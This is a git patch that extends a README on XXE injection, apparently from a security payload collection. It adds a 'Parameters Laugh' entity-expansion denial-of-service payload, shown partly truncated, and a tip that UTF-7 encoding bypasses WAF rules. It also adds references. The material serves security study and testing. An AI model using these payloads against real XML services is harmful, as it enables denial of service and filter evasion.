From 6bbdc85aa2dc002c8888252890e84a0f967d59dd Mon Sep 17 00:00:00 2001 From: Quentin Ligier Date: Mon, 3 Oct 2022 17:14:22 +0200 Subject: [PATCH] XXE: Improve the documentation - Add two references: "OWASP XXE prevention cheat sheet" and "XXE: How to become a Jedi" - Describe the Parameters Laugh attack - Expand the WAF bypass method with UTF-7 - Update the summary --- XXE Injection/README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 8136e66..b10c845 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -20,6 +20,8 @@ Syntax: `` - [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) - [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) - [Billion Laugh Attack](#billion-laugh-attack) + - [Yaml attack](#yaml-attack) + - [Parameters Laugh attack](#parameters-laugh-attack) - [Error Based XXE](#error-based-xxe) - [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) @@ -228,6 +230,20 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` +### Parameters Laugh attack + +A variant of the Billion Laughs attack, using delayed interpretation of parameter entities, by Sebastian Pipping. + +```xml +"> + %pe_1;"> + %pe_2;"> + %pe_3;"> + %pe_4; +]> + +``` ## Error Based XXE @@ -591,6 +607,7 @@ we can convert the character encoding to `UTF-16` using [iconv](https://man7.org ```bash cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` +UTF-7 encoding can be used as well to bypass UTF-8/UTF-16 rules. ## Labs @@ -599,6 +616,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) +* [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) * [Detecting and exploiting XXE in SAML Interfaces](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) - 6. Nov. 2014 - Von Christian Mainka * [[Gist] staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [[Gist] mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) @@ -619,3 +637,4 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml * [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube) * [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon * [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK +* [XXE: How to become a Jedi](https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf) - Zeronights 2017 - Yaroslav Babin